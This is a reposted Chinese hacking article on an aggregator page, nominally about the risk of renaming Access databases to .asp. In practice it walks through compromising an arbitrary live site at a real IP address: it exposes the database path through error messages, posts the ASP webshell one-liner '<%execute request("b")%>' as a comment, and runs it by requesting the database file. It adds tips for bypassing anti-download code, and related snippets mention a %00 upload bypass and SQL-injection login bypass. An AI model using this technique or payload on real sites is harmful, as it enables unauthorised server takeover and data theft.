防下载网站文件后缀被改为asp的安全隐患(转)

news/2024/5/9 17:47:00/文章来源:https://blog.csdn.net/cuanjun1153/article/details/100388263
防下载网站文件后缀被改为asp的安全隐患(转)[@more@]

  可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa.先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell.

  一。思路

  大家都知道为asp文件的标志符,也就是说一个asp文件只会去执行之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有,那当我们访问这个asp数据库的时候就会去执行之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。

  二。示例

  随便找个目标,首先我们暴库,看是不是asp后缀的数据库:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210

  返回:

  Microsoft VBScript 编译器错误 错误 '800a03f6'缺少 'End'

  /iisHelp/common/500-100.asp,行242

  Microsoft JET Database Engine 错误 '80004005'

  'D:log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

  /test/conn.asp,行18

  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供"网友评论"功能。我们注册个用户,发一条评论:

  < %execute request("b")%>

  这样我们就把asp代码:写入了数据库,那么数据库:就是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到:

  /iisHelp/common/500-100.asp,行242 Microsoft VBScript 运行时错误 错误 '800a000d'

  类型不匹配: 'execute'

  /test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266

  我们的插入的代码运行了。如下图:

  2004.10.26.14.34.27.11.GIF

  注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用.

  三。其他一些问题和思路

  1。对于改了后缀为asp,还对数据库里加入了等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。

  2。对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp.

  

本文来自:http://www.linuxpk.com/30602.html

--&gtlinux电子图书免费下载和技术讨论基地

·上一篇:SYMANTEC防火墙内核溢出漏洞利用之安全返回

·下一篇:黑客学前班,了解黑客经常使用哪些工具
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970150/,如需转载,请注明出处,否则将追究法律责任。

上一篇: CLR中代码访问安全检测实现原理(转)
下一篇: 远程登陆在专业版下开3389的方法大全(转)
user_pic_default.png
请登录后发表评论 登录
全部评论
<%=items[i].createtime%>

<%=items[i].content%>

<%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%=items[i].items.items[j].createtime%> 回复

<%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>

<%}%> <%if(items[i].items.total > 5) { %>
还有<%=items[i].items.total-5%>条评论) data-count=1 data-flag=true>点击查看
<%}%>
<%}%> <%}%>
RegisterForBlog
  • 博文量
    297
  • 访问量
    1578949

最新文章

  • eTrust全方位实现安全管理(转)
  • 电子支付与安全的关系及其经济分析二(转)
  • 电子支付与安全的关系及其经济分析三(转)
  • 让个人电脑也拥有一把保护伞—个人防火墙(转)
  • 整体大于部分之和—ServGate的整合安全(转)
  • 识破病毒的“障眼法”进一步防御病毒(转)
  • 实验室环境下测试千兆入侵检测系统(转)
  • 病毒肆虐信息安全问题不容忽视(转)
  • 覆盖*printf()系列函数本身的返回地址(转)
  • 中国信息安全体系机构基本框架与构想(转)

转载于:http://blog.itpub.net/10763080/viewspace-970150/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_854373.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PHP网站警报,多种PHP程序过滤漏洞(转)

PHP网站警报&#xff0c;多种PHP程序过滤漏洞(转)[more]危害&#xff1a;直接上传任意文件漏洞描述&#xff1a;当PHP程序有指定PATH时&#xff0c;在PATH文件后门加入%00可以上传任意文件.测试程序&#xff1a;NEATPIC PHP目录直读版 1.2.3http://web.cncode.com/SoftView.asp…

防止恶意解析——禁止通过IP直接访问网站

一、什么是恶意解析一般情况下&#xff0c;要使域名能访问到网站需要两步&#xff0c;第一步&#xff0c;将域名解析到网站所在的主机&#xff0c;第二步&#xff0c;在web服务器中将域名与相应的网站绑定。但是&#xff0c;如果通过主机IP能直接访问某网站&#xff0c;那么把域…

Nginx 通过 certbot 为网站自动配置 SSL 证书并续期

一、背景知识 1.1、http 和 https 是什么&#xff1f; 简单来说&#xff0c;http 是一个传输网页内容的协议&#xff0c;比如你看到的 http 开头的网站 http://www.163.com &#xff0c;其网页上的文字、图片、 CSS 、 JS 等文件都是通过 http 协议传输到我们的浏览器&#xff…

详细的图文介绍如何利用XAMPP本地建站的环境配置教程

WordPress 是一个简便快捷&#xff0c;用途广&#xff0c;人气旺的一个开源的博客建站程序。很有很多等您去发现。 简便快捷&#xff1a;在性能上易于操作、易于浏览&#xff1b; 用途广&#xff1a;可以建博客&#xff0c;可以建企业的官网等等。 人气旺&#xff1a;这个好处就…

php或js判断网站访问者来自手机或者pc端源码

很多时候也可以通过逻辑程序来进行判断&#xff0c;如PHP、JS是常用的两种识别访问设备类型的常用方法。 原理都是采用识别访问客户端的HTTP_USER_AGENT&#xff0c;然后进行关键字匹配进行确定设备类型&#xff0c;对于伪造HTTP头的就区分不出来了。 区分设备类型然后要做的就…

SQL注入全过程,含实例初步注入--绕过验证,直接登录安全较低公司网站登陆框如下:可以看到除了账号密码之外

SQL注入全过程,含实例 初步注入--绕过验证&#xff0c;直接登录 公司网站登陆框如下&#xff1a; 可以看到除了账号密码之外&#xff0c;还有一个公司名的输入框&#xff0c;根据输入框的形式不难推出SQL的写法如下&#xff1a;   SELECT * From Table WHERE NameXX and Pass…

使用libsvm对政府网站访问数据的分析和预测

创新性 选取题材&#xff0c;政府网站访问数据。想通过使用人工智能的方法&#xff0c;根据已有数据建立模型&#xff0c;对新的访问数据进行鉴别&#xff0c;区分网站访问是否为正常访问&#xff0c;从而进行一些业务处理。更进一步&#xff0c;预测哪些是危险访问&#xff0…

看透 Spring MVC 源代码分析与实践——网站基础知识

每天都会分享Java架构文章&#xff0c;喜欢的朋友关注我。ps&#xff1a;文末有彩蛋&#xff0c;惊喜等着你 网站架构及其演变过程 基础结构 网络传输分解方式&#xff1a; 标准的 OSI 参考模型TCP/IP 参考模型海量数据的解决方案 缓存和页面静态化缓存通过程序直接保存在内…

用户在电商网站中购买成功了,那么在微服务中经历了什么?

当我傻啊&#xff0c;用户在电商网站购买成功&#xff0c;还在微服务中&#xff0c;那肯定就是有一套微服务架构的电商系统。 设计一套电商系统还不简单 简单想象一下&#xff0c;既然是一个电商系统&#xff0c;有用户去购买&#xff0c;就肯定得有一个用户模块&#xff0c;…

JAVA爬取网站查询网络IP所在地

JAVA爬取网站查询网络IP所在地 网络中我们上网都是一个ip地址&#xff0c;在获取对象网络ip的时候&#xff0c;如果想查询他所在网络的地址怎么搞呢&#xff1f;上代码 1.写一个方法通过站长工具网站查询到你输入的ip的地址&#xff0c;需要用URL去爬取网站数据 /**ip就是需要…

建站技术是一锤子买卖,而建站服务则是长久性的共赢吗?

近年来&#xff0c;服务外包需要越来越多&#xff0c;业务也越来越多样化&#xff0c;特别是IT服务外包。随着资本市场的进入&#xff0c;人力成本的提升&#xff0c;素质教育与实际工作环境的脱钩&#xff0c;可谓是一将难求&#xff0c;所以很多公司或单位开始将目光关注到第…

手机微信小程序公众号交友平台网站定制开发,相亲网站系统建设,婚恋相亲网站制作

10几年的技术团队&#xff0c;专业定制交友网站开发&#xff0c;交友平台网站建设&#xff0c;婚恋网站平‌‌‌‌台开发建设&#xff0c;可仿百合网&#xff0c;世纪佳缘网&#xff0c;支持电脑版手机版微信版小程序版APP版&#xff0c;由10年的技术团队专业定制&#xff0c;需…

网站站内、站外链接优化技巧与作用

其实网站站内链接优化和站外链接优化一样重要&#xff0c;两者是相辅相成的&#xff0c;可能在对不同的搜索引擎的时候有些不一样&#xff0c;在相同条件下百度更加注重的是内容&#xff0c;谷歌更加注重的是链接&#xff0c;所以这两个都要同时做好才能让网站对搜索引擎更加友…

国际版云购网站代码开发实现案例

最近把之前的中文版元购夺宝网站做了改变&#xff0c;感觉还是比较不错的&#xff0c;算是高大上国际版云购网站代码开发实现案例&#xff0c;现在分享给大家看看。 预览效果图&#xff1a; function is_php($version 5.0.0){static $_is_php;$version (string)$version;if …

Google有三个.cn网站可以访问了,但它们只面向开发者

12 月 8 日&#xff0c;Google 在北京举办了一场规模空前的开发者活动&#xff0c;推出了三个不需科学上网就能访问的子站点。 developers.google.cn firebase.google.cn developer.android.google.cn 虽然 Google 早在 2010 年就正式退出了中国市场&#xff0c;但它在开发者…

Nginx之坑:完全理解location中的index,配置网站初始页

文章目录index指令的作用index指令详解基本内容&#xff08;中文文档和官方文档都可见&#xff09;&#xff1a;核心内容&#xff08;中文文档没有或一笔带过&#xff0c;而官方文档作详细解释&#xff09;&#xff1a;实例Nginx中文文档Nginx官方文档吐槽index指令的作用 在前…

2019fresco依赖_在2019年建立一个无依赖网站

我的新改进个人网站的屏幕截图 经过几年的基本无视后&#xff0c;我最近决定是时候刷新我的个人站点了 。 先前的迭代结合了Gulp和Bower&#xff0c;并结合了Susy&#xff08;网格系统的Sass库&#xff09;&#xff08;版本2&#xff0c;而不是最新的版本3&#xff09;。 我上一…

2007最牛X网站收集

50. 经典桌面 这个名叫东子的偏执狂不知花了多少工夫&#xff0c;mydeskcity.com的内容量达到了40G&#xff0c;很多图片都是站长本人在国外搜集后&#xff0c;自己进行加工的作品。 http://www.mydeskcity.com/ 49. 画猪头 在指定的对话框里面随便画一个猪头&#…

纯css实现网站导航条下拉效果

不用javascript效果实现导航条的下拉效果。 纯css属性实现&#xff0c;主要应用到绝对定位中的left&#xff1a;auto和 left&#xff1a;-9999px&#xff1b;来隐藏或者鼠标经过的时候显示下拉菜单。 下面是代码&#xff1a; <!DOCTYPE html> <html> <head&g…

网站右侧导航条的玩法

最近心情很不好&#xff0c;各种工作生活上面的事情&#xff0c;让我很是受伤&#xff0c;刚出来工作感觉程序员确实是个神奇的行业&#xff0c;一个个都觉得自己的智商挺高的&#xff0c;哎&#xff0c;每天起早贪黑的上下班&#xff0c;还天天受气&#xff0c;真是日了够了&a…